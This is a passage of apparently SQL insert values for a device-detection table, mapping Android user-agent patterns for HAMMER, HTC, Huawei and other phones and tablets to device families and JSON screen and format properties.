Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HAMMER_AXE_M_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HAMMER_ENERGY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HEAVEN 10.1 1.2) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HERO1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HERO3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HERO4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HERO7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HM-I557-FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HT16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HT16Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HT17) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HT17Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HT20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HT20Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HT30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC 2PS5200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC 2PST1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC 2PXH3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 10 compact) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 10 lifestyle) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 10 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 626) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 626s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 630 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 650 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 816 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 816) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 825 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 825) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire 826 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC Desire EYE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One A9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One A9s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One M8s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One M9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One M9PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One M9_Prime Camera Edition) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One S9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One X10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One X9 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One_E8 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One_M8 Eye) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One_M8 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC One_M8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC U Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC6525LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC6535LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTCD160LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTCD160LVWPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTCD200LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_0P6B-orange-LS/6.14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_A9sx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_D10i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_D10u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_D530u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_D816x) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_Desire_816) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_Desire_820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_Desire_EYE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_M8Sx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_M9pw) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_One_E8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_One_M8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_One_M8/6.12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_One_M8_dual_sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_One_M8s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_One_M8s/2.12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_S9u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_U-2u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_X10u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HTC_X9u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI ATH-UL01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI ATH-UL06) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CAM-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CAM-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CAM-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CAN-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CAN-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CAN-L12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CAN-L13) 